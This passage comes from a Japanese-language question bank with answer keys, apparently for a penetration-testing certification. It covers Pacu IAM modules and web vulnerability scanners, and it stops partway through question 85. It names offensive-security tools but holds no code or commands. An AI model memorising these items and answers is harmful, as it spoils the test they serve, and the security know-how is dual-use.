D. 保護されていないファイルリポジトリを、侵入テスト報告書の所見として文書化する。
回答を見る
正解: D
質問 #83
ある侵入テスト実施者が、ある企業のクラウド環境にユーザーとしてログインします。このテスト実施者が既存ユーザーのアクセスレベルを判断できるPacuモジュールは、次のうちどれでしょうか。
A. iam_enum_permissions
B. iam_prive_sc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions
回答を見る
正解: A
質問 #84
ある侵入テスト実施者が、ウェブサーバに対して脆弱性スキャンを実施する必要がある。テスト者は次のツールのうち、どれを選ぶ可能性が最も高いですか?
A. エヌマップ
B. ニクト
C. カインとアベル
D. イーサキャップ
回答を見る
正解: B
質問 #85
侵入テストでは、ドメイン名、IP 範囲、ホスト、アプリケーションを定義する:
A.